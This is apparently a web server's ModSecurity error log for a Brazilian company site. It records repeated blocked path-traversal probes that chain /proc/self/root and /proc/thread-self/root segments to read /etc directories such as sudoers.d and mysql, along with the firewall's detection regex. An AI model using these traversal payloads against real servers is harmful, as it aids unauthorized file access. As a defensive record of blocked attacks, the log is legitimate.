[Tue Mar 17 09:08:17.754740 2026] [:error] [pid 11469:tid 140411624429312] [client 74.7.241.46:58234] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEMZDEJR9VXonE_-1LaQAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:19.098982 2026] [:error] [pid 11469:tid 140411607643904] [client 74.7.241.46:38662] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEM5DEJR9VXonE_-1LawAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:20.259097 2026] [:error] [pid 2305:tid 140411641214720] [client 74.7.241.46:38674] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablENAQohV2v-7oj5HH3pQAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:21.589041 2026] [:error] [pid 2325:tid 140411641214720] [client 74.7.241.46:38678] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablENe82sZHvlq4xgHq_yQAAAow"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:22.921366 2026] [:error] [pid 2325:tid 140411674785536] [client 74.7.241.46:38688] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablENu82sZHvlq4xgHq_ygAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:24.248150 2026] [:error] [pid 11293:tid 140411574073088] [client 74.7.241.46:38696] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEONCmCSWTlPouqorH_wAAANQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:25.771389 2026] [:error] [pid 11293:tid 140411540502272] [client 74.7.241.46:38708] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEOdCmCSWTlPouqorIAwAAANg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:27.103144 2026] [:error] [pid 1016:tid 140411741927168] [client 74.7.241.46:38714] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEO5qmL8PQht4WJFlEYwAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:27.226844 2026] [:error] [pid 1016:tid 140411691570944] [client 74.7.228.16:43626] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablEO5qmL8PQht4WJFlEZAAAAUY"]
[Tue Mar 17 09:08:28.302893 2026] [:error] [pid 1210:tid 140411741927168] [client 74.7.241.46:36206] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEPFKJy4A1bGlmj9BSZgAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:29.588695 2026] [:error] [pid 11469:tid 140411741927168] [client 74.7.241.46:36208] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEPZDEJR9VXonE_-1LfAAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:30.856545 2026] [:error] [pid 7000:tid 140411624429312] [client 74.7.241.46:36216] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEPhePVOt35XCGZP8sowAAA44"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:32.241551 2026] [:error] [pid 2325:tid 140411649607424] [client 74.7.241.46:36222] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEQO82sZHvlq4xgHq_0AAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:33.509427 2026] [:error] [pid 7437:tid 140411616036608] [client 74.7.241.46:36224] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEQQeiSKl8TjouI-b_OgAAA88"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:34.798521 2026] [:error] [pid 7000:tid 140411658000128] [client 74.7.241.46:36234] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablEQhePVOt35XCGZP8sqAAAA4o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:37.126695 2026] [:error] [pid 11469:tid 140411658000128] [client 74.7.241.46:36240] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablERZDEJR9VXonE_-1LggAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:37.958961 2026] [:error] [pid 7000:tid 140411716749056] [client 74.7.243.203:60308] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablERRePVOt35XCGZP8sqwAAA4M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:08:39.555196 2026] [:error] [pid 2305:tid 140411624429312] [client 74.7.241.46:60862] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablERwQohV2v-7oj5HH3qgAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:40.705547 2026] [:error] [pid 7437:tid 140411674785536] [client 74.7.241.46:60872] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablESAeiSKl8TjouI-b_PwAAA8g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:41.582649 2026] [:error] [pid 1961:tid 140411574073088] [client 74.7.243.203:47516] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablESXRXaaWotPICgYsiTwAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:08:43.155144 2026] [:error] [pid 7437:tid 140411666392832] [client 74.7.241.46:60876] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablESweiSKl8TjouI-b_QwAAA8k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:08:44.555234 2026] [:error] [pid 2473:tid 140411674785536] [client 74.7.241.46:60882] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablETKBJNF7axNlVR0X59AAAAAg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
